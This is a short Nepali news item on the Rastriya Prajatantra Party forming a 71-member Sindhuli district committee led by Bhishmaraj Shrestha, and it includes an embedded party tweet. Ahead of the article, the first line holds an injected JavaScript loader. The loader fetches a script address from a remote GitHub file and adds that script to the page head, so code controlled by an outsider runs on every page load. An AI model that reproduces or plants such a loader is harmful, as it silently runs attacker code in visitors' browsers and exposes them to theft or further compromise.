;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर १४,
काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टी (राप्रपा) ले सिन्धुलीमा भिष्मराज श्रेष्ठको नेतृत्वमा ७१ सदस्यीय कार्यसमिति गठन गरेको छ ।
आइतबार श्रेष्ठको नेतृत्वाम सर्बसम्मत रुपमा ७१ सदस्यीय समिति गठन गरेको राप्रपाले जनाएको छ । ७७ वटै जिल्लामा संगठन विस्तार गर्न लागि परेको राप्रपाले पछिल्लो पटक सिन्धुलीमा आफ्नो कार्यसमिति गठन गरेको हो ।
सिन्धुलीमा जिल्ला समायोजन सम्पन्न । जिल्ला अध्यक्षमा भिष्मराज श्रेष्ठको नेतृत्वमा ७१ सदस्यीय कार्यसमिति सर्बसम्मत चयन । अध्यक्ष लगायत पदाधिकारी एबम सदस्यहरुमा हार्दिक हार्दिक बधाई तथा सफल कार्यकालको शुभकामना । pic.twitter.com/72mJoovjqx
— राप्रपा नेपाल (@rpp_nepal) November 29, 2020
फेसबुक प्रतिक्रियाहरु